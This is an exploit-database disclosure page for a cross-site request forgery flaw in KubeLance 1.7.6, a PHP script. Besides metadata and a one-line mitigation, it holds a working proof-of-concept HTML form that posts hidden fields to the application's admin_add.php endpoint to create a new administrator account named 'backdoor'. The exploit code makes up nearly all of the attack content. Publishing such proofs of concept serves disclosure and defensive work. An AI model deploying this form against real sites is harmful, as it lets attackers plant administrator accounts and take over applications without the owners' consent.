KubeLance 1.7.6 (Add Admin) CSRF Vulnerability

vendor:

KubeLance

by:

Milos Zivanovic

8,8

CVSS

HIGH

Cross Site Request Forgery (Add Admin Exploit)

352

CWE

Product Name: KubeLance

Affected Version From: 1.7.6

Affected Version To: 1.7.6

Patch Exists: NO

Related CWE: N/A

CPE: a:kubelabs:kubelance:1.7.6

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP

2010

KubeLance 1.7.6 (Add Admin) CSRF Vulnerability

KubeLance script lack of cross site request forgery protection, allowing us to make exploit and add new admin user.

Mitigation:

Implementing proper CSRF protection.

Source

Exploit-DB raw data:

[#-----------------------------------------------------------------------------------------------#]
[#] Title: KubeLance 1.7.6 (Add Admin) CSRF Vulnerability
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail[dot]com
[#] Date: 02. February 2010.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: KubeLance
[#] Version: 1.7.6
[#] Platform: PHP
[#] Link: http://www.kubelabs.com/kubelance/
[#] Price: 90 $
[#] Vulnerability: Cross Site Request Forgery (Add Admin Exploit)
[#-----------------------------------------------------------------------------------------------#]

KubeLance script lack of cross site request forgery protection, allowing us to make exploit and add new admin user.

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/kubelance/adm/admin_add.php" method="post">
<input type="hidden" name="username" value="backdoor">
<input type="hidden" name="password" value="another-admin-added">
<input type="submit" name="submit">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[#]EOF